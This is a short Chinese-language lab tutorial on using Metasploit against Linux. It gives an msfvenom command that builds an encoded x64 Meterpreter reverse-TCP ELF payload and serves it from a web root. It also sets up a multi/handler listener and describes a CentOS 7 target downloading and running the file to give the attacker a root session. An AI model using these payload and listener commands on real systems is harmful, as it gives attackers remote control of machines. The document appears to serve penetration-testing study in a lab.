继续学习metasploit的实战应用,这次针对Linux系统实施渗透
1、使用mfsvenom生成Linux可执行文件
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.47.165 LPORT=4444 -b "\x00" -i 10 -f elf -o /var/www/html/lzb
-f 指定 elf 即 linux 操作系统的可执行文件类型
2、打开MSF配置监听
还是使用exploit/multi/handler模块进行监听,但和之前不同的是,本次针对的是Linux的操作系统,所以要将payload更改为和上面生成对应的payload
set payload linux/x64/meterpreter/reverse_tcp
最终的配置如下
运行开始监听
3、目标机运行恶意程序
这里使用CentOS7作为目标机,kali攻击机先打开apache服务器,然后目标机通过服务器下载恶意软件
给予执行权限并运行
立刻获得root权限
当我们更换lzb用户去运行文件时,攻击机获得的权限就是lzb的权限